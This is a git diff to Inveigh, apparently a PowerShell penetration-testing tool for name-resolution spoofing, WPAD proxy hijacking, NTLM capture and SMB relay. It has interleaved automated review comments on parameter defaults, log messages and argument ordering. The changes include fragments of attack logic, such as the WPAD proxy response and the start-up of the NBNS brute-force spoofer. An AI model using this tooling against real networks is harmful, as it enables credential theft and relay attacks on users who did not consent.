Diffstat (limited to 'Scripts')
-rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 18 | ||||
-rw-r--r-- | Scripts/Inveigh.ps1 | 37 |
2 files changed, 33 insertions, 22 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index e2ed0bb..983ac0c 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -90,7 +90,7 @@ target. Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error. .PARAMETER ConsoleOutput -Default = Disabled: (N,Y,Medium,Low) Enable/Disable real time console output. If using this option through a shell, test to +Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. .PARAMETER ConsoleStatus @@ -164,7 +164,7 @@ param [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$Usernames = "", @@ -188,9 +188,9 @@ if ($invalid_parameter) throw } -if(!$ProxyIP) +if($ProxyIP -eq '0.0.0.0') { - $ProxyIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) + $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) } if(!$OutputDir) 
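Review bot: In the `@@ -188` hunk `$proxy_WPAD_IP` is assigned only when `$ProxyIP` still holds the new `0.0.0.0` default, so a caller who passes an explicit `-ProxyIP` leaves it unset, and the `$WPADResponse` string built in the `@@ -492` hunk then interpolates an empty host. The Inveigh.ps1 `@@ -945` hunk of this same commit covers that case with an else branch; the relay script needs the equivalent after the closing brace of the if, `else { $proxy_WPAD_IP = $ProxyIP }`. The `@@ -164` hunk changes the default from an empty string to `0.0.0.0`, so the old `!$ProxyIP` test would no longer fire; the new sentinel comparison is consistent with that, but the `.PARAMETER ProxyIP` help text is outside the hunk and should say that `0.0.0.0` means "use the local address". Code after `if(!$OutputDir)` continues past the hunk.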
@@ -492,7 +492,7 @@ if($Proxy -eq 'Y') { $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null $ProxyPortFailover = $ProxyPort + 1 - $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}" + $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}" $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) if($ProxyIgnore.Count -gt 0) @@ -1813,8 +1813,8 @@ $SMB_relay_response_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00') { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) + $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true } else 
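Review bot: The new message text in the `@@ -1813` hunk is written out twice, once for `console_queue` and again inside the `log_file_queue.Add(...)` call, and the `@@ -2249` hunk repeats the same pair, so the wording now lives in four places that must be edited together. Building the string once, e.g. `$relay_message = "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target"`, and passing `$relay_message` to both Add calls keeps console and log output from diverging. The enclosing `$SMB_relay_response_scriptblock` starts and ends outside both hunks.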
@@ -2249,8 +2249,8 @@ $SMB_relay_response_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00') { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) + $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true } else diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 0442f54..51b7d84 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -103,7 +103,7 @@ wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag duri Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. .PARAMETER HTTPContentType -Default = none: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" +Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. .PARAMETER HTTPDir 
@@ -195,7 +195,7 @@ challenge will be generated for each request. Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to +Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. .PARAMETER ConsoleStatus @@ -535,6 +535,7 @@ if(!$elevated_privilege) } +$inveigh.hostname_spoof = $false $inveigh.running = $true if($StatusOutput -eq 'Y') @@ -945,6 +946,10 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') { $proxy_WPAD_IP = $IP } + else + { + $proxy_WPAD_IP = $ProxyIP + } if($WPADIP -and $WPADPort) { @@ -1330,7 +1335,7 @@ $SMB_NTLM_functions_scriptblock = # HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener $HTTP_scriptblock = { - param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse) function NTLMChallengeBase64 { 
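Review bot: The `@@ -1330` hunk inserts `$NBNSBruteForcePause` into the middle of the scriptblock's positional `param` list, and the three `AddArgument` chains in `@@ -3088`, `@@ -3109` and `@@ -3130` had to be re-ordered by hand to match; if any one of those chains drifts from the param order, every argument after the insertion point is bound to the wrong parameter, presumably without an error since most of the values are strings or arrays. Passing the new value by name, for example `.AddParameter('NBNSBruteForcePause', $NBNSBruteForcePause)`, or appending new parameters at the end of the list instead of in the middle, would remove that coupling. A one-line comment above the `param` line, `# order must match the AddArgument chains in HTTPListener, HTTPSListener and ProxyListener`, would at least make the constraint visible. `$HTTP_scriptblock` continues well past the hunk.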
@@ -1576,8 +1581,8 @@ $HTTP_scriptblock = if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})) { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")]) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")]) } } @@ -3088,8 +3093,8 @@ function HTTPListener() $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } 
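Review bot: The reworded message in the `@@ -1576` hunk now contains the phrase ` user agent `, while the console filters in the `@@ -3292` and `@@ -3769` hunks are narrowed in the same commit from `"* user agent *"` to `"* user agent received *"`, so this new wpad.dat notice does not match that filter branch. If the intent is for the ignored-wpad.dat notice to be shown only when `ConsoleOutput -eq 'Y'`, the message should carry the same `user agent received` wording or the filter should keep a pattern that matches it; if it is meant to fall through to another branch, a short comment on the filter line saying which messages it is meant to catch would save the next reader the same check. The `switch` those filters belong to starts and ends outside the hunks.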
@@ -3109,8 +3114,8 @@ function HTTPSListener() $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null } @@ -3130,8 +3135,8 @@ function ProxyListener() $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null } @@ -3262,6 +3267,12 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi } +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + # Control Loop Start if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause) { 
@@ -3292,7 +3303,7 @@ if($inveigh.console_output) $inveigh.console_queue.RemoveAt(0) } - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"} + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { if($ConsoleOutput -eq 'Y') @@ -3769,7 +3780,7 @@ if($inveigh.tool -ne 1) $inveigh.console_queue.RemoveAt(0) } - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"} + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { if($ConsoleOutput -eq 'Y') |